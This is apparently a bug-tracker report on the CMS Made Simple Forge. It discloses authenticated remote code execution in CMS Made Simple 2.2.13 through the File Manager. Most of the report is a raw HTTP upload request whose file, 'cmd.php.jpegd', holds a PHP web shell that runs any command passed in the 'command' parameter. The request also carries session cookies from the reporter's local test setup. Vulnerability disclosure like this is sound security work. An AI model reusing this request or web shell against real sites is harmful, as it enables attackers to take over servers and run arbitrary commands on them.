CMS MADE SIMPLE FORGE

CMS Made Simple Core

 

[#12275] Remote Code Execution (RCE) authenticated with crafted JPG files

avatar
Created By: Joshua Provoste (joshuap)
Date Submitted: Mon Mar 16 10:18:37 -0400 2020

Assigned To:
Version: 2.2.13
CMSMS Version: 2.2.13
Severity: Critical
Resolution: None
State: Open
Summary:
Remote Code Execution (RCE) authenticated with crafted JPG files
Detailed Description:
Hello,

CMS Made Simple 2.2.13 it's vulnerable to Remote Code Execution (RCE)
authenticated, using crafted JPG extension files through the Filemanager.


#### POST request ####

POST /cmsms/admin/moduleinterface.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: es-CL,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------1194998256194298217245699085
Content-Length: 689
Origin: http://127.0.0.1
Connection: close
Cookie:
13635816547db5ebee8fd12d1d0399c2da7b33fa=1eeb1837469d8314f770073d4287fca5370e2a80%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiam9zaHVhcCIsImVmZl91aWQiOm51bGwsImVmZl91c2VybmFtZSI6bnVsbCwiaGFzaCI6IiQyeSQxMCRhdXpSYThEd3N6Wk9hREZHV08yT3ZPYnFGOWR2SjR5bWFQV25tWVl3WGVxRFpSZ2VNXC9IdnUifQ%3D%3D;
__c=7eac2c88c0a471c85e7; CMSICc6ae4b144e=80f585d9fad9b2cd3f1a4b392f3b8e31;
CMSSESSID52563d040680=62311d807899e65f0b3f00095d13494b

-----------------------------1194998256194298217245699085
Content-Disposition: form-data; name="mact"

FileManager,m1_,upload,0
-----------------------------1194998256194298217245699085
Content-Disposition: form-data; name="__c"

7eac2c88c0a471c85e7
-----------------------------1194998256194298217245699085
Content-Disposition: form-data; name="disable_buffer"

1
-----------------------------1194998256194298217245699085
Content-Disposition: form-data; name="m1_files[]"; filename="cmd.php.jpegd"
Content-Type: application/octet-stream

<?php
if(isset($_GET["command"])) {
	system($_GET['command']);
}
?>
-----------------------------1194998256194298217245699085--


History